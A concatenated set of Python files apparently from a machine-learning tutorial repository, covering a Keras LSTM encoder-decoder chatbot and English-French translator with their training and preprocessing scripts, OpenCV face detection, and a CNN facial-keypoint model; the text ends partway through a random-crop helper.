encoder_states = [state_h, state_c]
# DECODER
# Set up the decoder, using encoder_states as initial state
if embedding_layer:
decoder_inputs = Input(shape=(None,))
else:
decoder_inputs = Input(shape=(None, num_encoder_tokens))
# add an embedding layer
# decoder_emb_layer = Embedding(num_decoder_tokens, latent_dim, mask_zero=True)
if embedding_layer:
decoder_emb = encoder_emb_layer(decoder_inputs)
else:
decoder_emb = decoder_inputs
# we set up our decoder to return full output sequences
# and to return internal states as well, we don't use the
# return states in the training model, but we will use them in inference
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _, = decoder_lstm(decoder_emb, initial_state=encoder_states)
# dense output layer used to predict each character ( or word )
# in one-hot manner, not recursively
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# finally, the model is defined with inputs for the encoder and the decoder
# and the output target sequence
# turn encoder_input_data & decoder_input_data into decoder_target_data
model = Model([encoder_inputs, decoder_inputs], outputs=decoder_outputs)
# model.summary()
# define encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# define decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
# Get the embeddings of the decoder sequence
if embedding_layer:
dec_emb2 = encoder_emb_layer(decoder_inputs)
else:
dec_emb2 = decoder_inputs
decoder_outputs, state_h, state_c = decoder_lstm(dec_emb2, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def predict_sequence(enc, dec, source, n_steps, cardinality, char_level=False):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
if char_level:
sampled_token_index = to_categorical(np.argmax(y), num_classes=61)
else:
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
target_seq[0, 0] = sampled_token_index
return np.array(output)
def decode_sequence(enc, dec, input_seq):
# Encode the input as state vectors.
states_value = enc.predict(input_seq)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1,1))
# Populate the first character of target sequence with the start character.
target_seq[0, 0] = 0
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sequence = []
while not stop_condition:
output_tokens, h, c = dec.predict([target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
# sampled_char = reverse_target_char_index[sampled_token_index]
decoded_sequence.append(output_tokens[0, -1, :])
# Exit condition: either hit max length or find stop token.
if (output_tokens == '<PAD>' or len(decoded_sequence) > 50):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1,1))
target_seq[0, 0] = sampled_token_index
# Update states
states_value = [h, c]
return decoded_sequence
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""Pad x
:param x: list of sequences
:param length: Length to pad the sequence to, If None, use length
of longest sequence in x.
:return: Padded numpy array of sequences"""
return pad_sequences(x, maxlen=length, padding="post")
def preprocess(x, y):
"""Preprocess x and y
:param x: Feature list of sentences
:param y: Label list of sentences
:return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x2 = [ [0] + s for s in preprocess_y ]
longest_x = max([len(i) for i in preprocess_x])
longest_y = max([len(i) for i in preprocess_y]) + 1
# max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
max_length = longest_x if longest_x > longest_y else longest_y
preprocess_x = pad(preprocess_x, length=max_length)
preprocess_x2 = pad(preprocess_x2, length=max_length)
preprocess_y = pad(preprocess_y, length=max_length)
# preprocess_x = to_categorical(preprocess_x)
# preprocess_x2 = to_categorical(preprocess_x2)
preprocess_y = to_categorical(preprocess_y)
return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
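# Teacher-forcing sketch (illustrative): preprocess_x2 is the decoder input,
# i.e. the target sequence shifted right by one step with a leading 0 token,
# while preprocess_y stays aligned with the decoder output. For a target
# sequence [5, 9, 2] this gives decoder input [0, 5, 9, 2] and a (padded,
# one-hot encoded) decoder target [5, 9, 2, 0, ...].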
def load_data(filename):
with open(filename) as f:
text = f.read()
return text.split("\n")
def load_dataset():
english_sentences = load_data("data/small_vocab_en")
french_sentences = load_data("data/small_vocab_fr")
return preprocess(english_sentences, french_sentences)
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
if __name__ == "__main__":
from generator import NMTGenerator
gen = NMTGenerator(source_file="data/small_vocab_en", target_file="data/small_vocab_fr")
gen.load_dataset()
print(gen.num_decoder_tokens)
print(gen.num_encoder_tokens)
print(gen.source_sequence_length)
print(gen.target_sequence_length)
print(gen.X_train.shape)
print(gen.y_train.shape)
for i, ((encoder_input_data, decoder_input_data), decoder_target_data) in enumerate(gen.next_train()):
# print("encoder_input_data.shape:", encoder_input_data.shape)
# print("decoder_output_data.shape:", decoder_input_data.shape)
if i % (len(gen.X_train) // gen.batch_size + 1) == 0:
print(i, ": decoder_input_data:", decoder_input_data[0])
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
return ' '.join([index_to_words[prediction] for prediction in logits])
num_encoder_tokens = 29046
num_decoder_tokens = 29046
latent_dim = 300
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_v13_4.831_0.219.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = pad(tokenized, length=37)
sequence = predict_sequence(enc, dec, X, 37, num_decoder_tokens)
# print(sequence)
result = logits_to_text(sequence)
print(result)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
# return ''.join([index_to_words[np.where(prediction==1)[0]] for prediction in logits])
text = ""
for prediction in logits:
char_index = np.where(prediction)[0][0]
char = index_to_words[char_index]
text += char
return text
num_encoder_tokens = 61
num_decoder_tokens = 61
latent_dim = 384
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_layer=False)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = to_categorical(pad(tokenized, length=37), num_classes=num_encoder_tokens)
# print(X)
sequence = predict_sequence(enc, dec, X, 206, num_decoder_tokens, char_level=True)
# print(sequence)
result = logits_to_text(sequence)
print(result)
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=32,
same_tokenizer=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
embedding_vectors = get_embedding_vectors(tokenizer)
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 300
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_matrix=embedding_vectors)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer="rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_v13_{val_loss:.3f}_{val_acc:.3f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_v13_4.806_0.219.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size),
validation_steps=(len(text_gen.X_test) // text_gen.batch_size),
callbacks=[checkpointer],
epochs=5)
print("[+] Model trained.")
model.save_weights("results/chatbot_v13.h5")
print("[+] Model saved.")
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=256,
same_tokenizer=True,
char_level=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 384
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_layer=False)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer=AdaBound(lr=1e-3, final_lr=0.1), loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_charlevel_v2_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size)+1,
validation_steps=(len(text_gen.X_test) // text_gen.batch_size)+1,
callbacks=[checkpointer],
epochs=50)
print("[+] Model trained.")
model.save_weights("results/chatbot_charlevel_v2.h5")
print("[+] Model saved.")
import tqdm
X, y = [], []
with open("data/fr-en", encoding='utf8') as f:
for i, line in tqdm.tqdm(enumerate(f), "Reading file"):
if "europarl-v7" in line:
continue
# X.append(line)
# if i == 2007723 or i == 2007724 or i == 2007725
if i <= 2007722:
X.append(line.strip())
else:
y.append(line.strip())
y.pop(-1)
with open("data/en", "w", encoding='utf8') as f:
for i in tqdm.tqdm(X, "Writing english"):
print(i, file=f)
with open("data/fr", "w", encoding='utf8') as f:
for i in tqdm.tqdm(y, "Writing french"):
print(i, file=f)
import glob
import tqdm
import os
import random
import inflect
p = inflect.engine()
X, y = [], []
special_words = {
"haha", "rockikz", "fullclip", "xanthoss", "aw", "wow", "ah", "oh", "god", "quran", "allah",
"muslims", "muslim", "islam", "?", ".", ",",
'_func_val_get_callme_para1_comma0', '_num2_', '_func_val_get_last_question', '_num1_',
'_func_val_get_number_plus_para1__num1__para2__num2_',
'_func_val_update_call_me_enforced_para1__callme_',
'_func_val_get_number_minus_para1__num2__para2__num1_', '_func_val_get_weekday_para1_d0',
'_func_val_update_user_name_para1__name_', '_callme_', '_func_val_execute_pending_action_and_reply_para1_no',
'_func_val_clear_user_name_and_call_me', '_func_val_get_story_name_para1_the_velveteen_rabbit', '_ignored_',
'_func_val_get_number_divide_para1__num1__para2__num2_', '_func_val_get_joke_anyQ:',
'_func_val_update_user_name_and_call_me_para1__name__para2__callme_', '_func_val_get_number_divide_para1__num2__para2__num1_Q:',
'_name_', '_func_val_ask_name_if_not_yet', '_func_val_get_last_answer', '_func_val_continue_last_topic',
'_func_val_get_weekday_para1_d1', '_func_val_get_number_minus_para1__num1__para2__num2_', '_func_val_get_joke_any',
'_func_val_get_story_name_para1_the_three_little_pigs', '_func_val_update_call_me_para1__callme_',
'_func_val_get_story_name_para1_snow_white', '_func_val_get_today', '_func_val_get_number_multiply_para1__num1__para2__num2_',
'_func_val_update_user_name_enforced_para1__name_', '_func_val_get_weekday_para1_d_2', '_func_val_correct_user_name_para1__name_',
'_func_val_get_time', '_func_val_get_number_divide_para1__num2__para2__num1_', '_func_val_get_story_any',
'_func_val_execute_pending_action_and_reply_para1_yes', '_func_val_get_weekday_para1_d_1', '_func_val_get_weekday_para1_d2'
}
english_words = { word.strip() for word in open("data/words8.txt") }
embedding_words = set()
f = open("data/glove.6B.300d.txt", encoding='utf8')
for line in tqdm.tqdm(f, "Reading GloVe words"):
values = line.split()
word = values[0]
embedding_words.add(word)
maps = open("data/maps.txt").readlines()
word_mapper = {}
for map in maps:
key, value = map.split("=>")
key = key.strip()
value = value.strip()
print(f"Mapping {key} to {value}")
word_mapper[key.lower()] = value
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
def map_text(line):
global unks
global digits
global mapped
global english
global special
result = []
append = result.append
words = line.split()
for word in words:
word = word.lower()
if word.isdigit():
append(p.number_to_words(word))
digits += 1
continue
if word in word_mapper:
append(word_mapper[word])
mapped += 1
continue
if word in english_words:
append(word)
english += 1
continue
if word in special_words:
append(word)
special += 1
continue
append("_unk_")
unks += 1
return ' '.join(result)
for file in tqdm.tqdm(glob.glob("data/Augment*/*"), "Reading files"):
with open(file, encoding='utf8') as f:
for line in f:
line = line.strip()
if "Q: " in line:
X.append(line)
elif "A: " in line:
y.append(line)
# shuffle X and y maintaining the order
combined = list(zip(X, y))
random.shuffle(combined)
X[:], y[:] = zip(*combined)
with open("data/questions", "w") as f:
for line in tqdm.tqdm(X, "Writing questions"):
line = line.strip().lstrip('Q: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
with open("data/answers", "w") as f:
for line in tqdm.tqdm(y, "Writing answers"):
line = line.strip().lstrip('A: ')
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
import numpy as np
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import numpy as np
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
while True:
# read the image from the cam
_, image = cap.read()
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
cv2.imshow("image", image)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
from models import create_model
from parameters import *
from utils import normalize_image
def untransform(keypoints):
return keypoints * 50 + 100
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
image = cv2.imread(sys.argv[1])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# # construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1.h5")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
# get all the faces in the image
faces = face_cascade.detectMultiScale(image, 1.2, 2)
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (255, 0, 0), 3)
face_image = image.copy()[y: y+h, x: x+w]
face_image = normalize_image(face_image)
keypoints = get_single_prediction(model, face_image)
show_keypoints(face_image, keypoints)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
from models import create_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data, resize_image, normalize_keypoints, normalize_image
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def show_keypoints_cv2(image, predicted_keypoints, true_keypoints=None):
for keypoint in predicted_keypoints:
image = cv2.circle(image, (keypoint[0], keypoint[1]), 2, color=2)
if true_keypoints is not None:
image = cv2.circle(image, (true_keypoints[:, 0], true_keypoints[:, 1]), 2, color="green")
return image
def untransform(keypoints):
return keypoints * 224
# construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_different-scaling.h5")
# X_test, y_test = load_data(testing_file)
# y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
# make a copy of the original image
image = frame.copy()
image = normalize_image(image)
keypoints = get_single_prediction(model, image)
print(keypoints[0])
keypoints = untransform(keypoints)
# w, h = frame.shape[:2]
# keypoints = (keypoints * [frame.shape[0] / image.shape[0], frame.shape[1] / image.shape[1]]).astype("int16")
# frame = show_keypoints_cv2(frame, keypoints)
image = show_keypoints_cv2(image, keypoints)
cv2.imshow("frame", image)
if cv2.waitKey(1) == ord("q"):
break
cv2.destroyAllWindows()
cap.release()
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.applications import MobileNetV2
import tensorflow as tf
import tensorflow.keras.backend as K
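# smoothL1 below is the Huber (smooth L1) loss: quadratic for errors smaller than
# HUBER_DELTA and linear beyond it, which makes keypoint regression less sensitive
# to outliers than plain MSE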
def smoothL1(y_true, y_pred):
HUBER_DELTA = 0.5
x = K.abs(y_true - y_pred)
x = K.switch(x < HUBER_DELTA, 0.5 * x ** 2, HUBER_DELTA * (x - 0.5 * HUBER_DELTA))
return K.sum(x)
def create_model(input_shape, output_shape):
# building the model
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same", input_shape=input_shape))
model.add(Activation("relu"))
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(MaxPooling2D(pool_size=(2, 2)))
# # model.add(Dropout(0.25))
# flattening the convolutions
model.add(Flatten())
# fully-connected layers
model.add(Dense(256))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(output_shape, activation="linear"))
# print the summary of the model architecture
model.summary()
# training the model using rmsprop optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
def create_mobilenet_model(input_shape, output_shape):
model = MobileNetV2(input_shape=input_shape)
# remove the last layer
model.layers.pop()
# freeze all the weights of the model except for the last 4 layers
for layer in model.layers[:-4]:
layer.trainable = False
# construct our output dense layer
output = Dense(output_shape, activation="linear")
# connect it to the model
output = output(model.layers[-1].output)
model = Model(inputs=model.inputs, outputs=output)
model.summary()
# training the model using adam optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
IMAGE_SIZE = (224, 224)
OUTPUT_SHAPE = (68, 2)
BATCH_SIZE = 20
EPOCHS = 30
training_file = "data/training_frames_keypoints.csv"
testing_file = "data/test_frames_keypoints.csv"
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints):
predicted_keypoints = untransform(predicted_keypoints)
true_keypoints = untransform(true_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def untransform(keypoints):
return keypoints * 224
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_mobilenet_crop.h5")
X_test, y_test = load_data(testing_file)
y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
y_pred = get_predictions(model, X_test)
print(y_pred[0])
print(y_pred.shape)
print(y_test.shape)
print(X_test.shape)
for i in range(50):
show_keypoints(X_test[i+400], y_pred[i+400], y_test[i+400])
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from tqdm import tqdm
# from tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard, ModelCheckpoint
import os
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
# # read the training dataframe
# training_df = pd.read_csv("data/training_frames_keypoints.csv")
# # print the number of images available in the training dataset
# print("Number of images in training set:", training_df.shape[0])
def show_keypoints(image, key_points):
# show the image
plt.imshow(image)
# use scatter() to plot the keypoints in the faces
plt.scatter(key_points[:, 0], key_points[:, 1], s=20, marker=".")
plt.show()
# show an example image
# n = 124
# image_name = training_df.iloc[n, 0]
# keypoints = training_df.iloc[n, 1:].values.reshape(-1, 2)
# show_keypoints(mpimg.imread(os.path.join("data", "training", image_name)), key_points=keypoints)
model_name = "model_smoothl1_mobilenet_crop"
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
# model.load_weights("results/model3.h5")
X_train, y_train = load_data(training_file, to_gray=False)
X_test, y_test = load_data(testing_file, to_gray=False)
if not os.path.isdir("results"):
os.mkdir("results")
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
# checkpoint = ModelCheckpoint(os.path.join("results", model_name), save_best_only=True, verbose=1)
history = model.fit(X_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(X_test, y_test),
# callbacks=[tensorboard, checkpoint],
callbacks=[tensorboard],
verbose=1)
model.save("results/" + model_name + ".h5")
import numpy as np
import pandas as pd
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import cv2
from tqdm import tqdm
import os
from parameters import IMAGE_SIZE, OUTPUT_SHAPE
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
# predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
# true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def resize_image(image, image_size):
return cv2.resize(image, image_size)
def random_crop(image, keypoints):
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
keypoints = keypoints.reshape(-1, 2)
try:
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
except ValueError:
return image, keypoints
image = image[top: top + new_h, left: left + new_w]
keypoints = keypoints - [left, top]
